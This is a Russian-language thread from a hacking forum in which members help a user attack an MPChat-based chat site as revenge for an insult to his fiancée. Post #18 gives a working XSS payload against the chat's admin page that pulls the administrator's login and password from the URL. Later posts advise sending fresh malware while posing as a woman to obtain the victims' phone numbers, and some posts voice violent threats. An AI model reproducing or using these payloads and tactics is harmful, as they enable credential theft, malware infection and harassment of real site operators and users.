ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

(((
  #11  
Старый 24.01.2006, 20:10
Аватар для West
West
Новичок
Регистрация: 18.01.2006
Сообщений: 10
Провел на форуме:
67502

Репутация: 0
По умолчанию (((

да никто не дал тут совета мне приличног кажетса ни кто не может справитса с МР чатом !!! Хот спасибо что посмотрели маю тему !!
 

  #12  
Старый 24.01.2006, 20:25
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Попробуй в сообщении кинуть картинку-пиздельщик :d
 

  #13  
Старый 24.01.2006, 20:26
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию

Всмысле не в сообщении(а там есть такая штука как "Почта")
 

  #14  
Старый 01.03.2006, 03:27
Аватар для blob
blob
Новичок
Регистрация: 28.02.2006
Сообщений: 3
Провел на форуме:
16684

Репутация: 0
По умолчанию

Чат ломается на уровне хтмла... до базы мне долезть не удалось, но вживление скрипта катит. Даже при наличии yourkey модера я не смог залезть в админку... сервак проверяет сессию на такие вещи. Но реально поиметь внутреннюю почту. Уязвимость в движке у всех чатов mpchat, маленькая, но позволяет делать с ним и с юзерами многое. Я сам с сегодня обижен на один такой чат ибо забанили всех клонов и повесили подтверждение на регистрацию влезу... убью
 

  #15  
Старый 01.03.2006, 03:34
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

Цитата:
Чат ломается на уровне хтмла... до базы мне долезть не удалось, но вживление скрипта катит.
Вот и помоги West-у, но тока в открытую не выкладывай. А то завтра ее, баги, уже не будет, а таких как West - будут. И будут также просить. Ну где их еще то взять, если баги постоянно закрывают?
__________________
+ (это не крестик, это плюсик!)
__________________


 

  #16  
Старый 01.03.2006, 03:53
Аватар для blob
blob
Новичок
Регистрация: 28.02.2006
Сообщений: 3
Провел на форуме:
16684

Репутация: 0
По умолчанию

To West.. в личку пиши, ща в нём сижу... У них в порядке вещей закидывать окнами ? Пиши короче
 

  #17  
Старый 01.03.2006, 10:28
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Цитата:
Люди Братья Помогите найти дыру в чате http://chat.sehri.com ето mpchat за обиду нанесённую моей невесте
А что вообше твоя невеста в чате делает ? лень просто стобой день провести ? или она уже к тебе равнодушна ? вообшим это твои проблемы, но я бы на твоём месте , не Админа морду набил, а твоей невести, вот тогда посмотрим он зайдёт в чаты или нет.
 

  #18  
Старый 01.03.2006, 11:56
Аватар для ¤ ¤ ¤Эльф¤ ¤ ¤
¤ ¤ ¤Эльф¤ ¤ ¤
Новичок
Регистрация: 11.01.2006
Сообщений: 25
Провел на форуме:
43292

Репутация: 2
Отправить сообщение для ¤ ¤ ¤Эльф¤ ¤ ¤ с помощью ICQ
По умолчанию

код для теста xss
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><form action="http://mpchat.com/_admin.php" target="_blank">
<textarea cols="50" rows="5" name="chat" id="chat">z style=`background:url(javascript:alert())`</textarea><br>
<input type="submit">
</form>[/QUOTE]<span id='postcolor'>

птом открыть админку и открыть чтарницу с этим кодом, птом заменить в поле alert() на
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">document.write(unescape(/%3Cimg%20src=%22javascript:z=window.open(%27%27,%2 7administration%27)%3Balert(z.document.location)%3 B%22%3E/))[/QUOTE]<span id='postcolor'>

и послать форму и откроется страница с xss иньекцией которая обратится в окно с именем administration и даст url с логином и пассвордом.

Что бы обезопасить свой чат нужно метод get сменить на post, тогда в админке url не будет состоять из логина и пассворда.
 

  #19  
Старый 29.03.2007, 15:02
Аватар для vlcman
vlcman
Новичок
Регистрация: 09.03.2007
Сообщений: 11
Провел на форуме:
30108

Репутация: 2
По умолчанию

¤ ¤ ¤Эльф¤ ¤ ¤
можно поподробней?
 

  #20  
Старый 29.03.2007, 22:27
Аватар для ЛифчиС5СВ
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920

Репутация: 369
По умолчанию

И еще метод - я не думаю, что там уже оч прошареные админы. Зарегься под какой-нибудь шикарной бабой (пускай твой диалог займет больше времени), всунь фотку модели какой, и
1. Всунь вирус поновее, чтобы они не просекли.
2. Узнай номер телефона.
Тогда и поговоришь по душам с теми людьми, коль уж они тебе так насолили
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В чем смысл жизни? flipper Болталка 63 08.07.2007 17:35
Чем открыть объемную базу? Sharky Форумы 20 09.08.2006 17:00
Где взять перл и эксплоит? Fyzzer Форумы 6 29.01.2006 23:19
химия своими руками silveran Болталка 43 11.01.2006 22:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ